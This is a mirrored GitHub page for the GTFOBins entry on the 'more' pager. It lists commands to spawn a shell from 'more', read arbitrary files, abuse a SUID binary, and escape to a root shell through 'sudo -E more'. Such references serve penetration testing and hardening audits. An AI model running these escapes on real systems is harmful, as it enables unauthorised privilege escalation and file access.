1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-14 19:31:34 +01:00
GTFOBins.github.io/_gtfobins/more.md
2018-10-05 18:55:38 +01:00

16 lines
253 B
Markdown

---
functions:
shell:
- code: |
TERM= more /etc/profile
!/bin/sh
file-read:
- code: more file_to_read
suid:
- code: ./more file_to_read
sudo:
- code: |
TERM= sudo -E more /etc/profile
!/bin/sh
---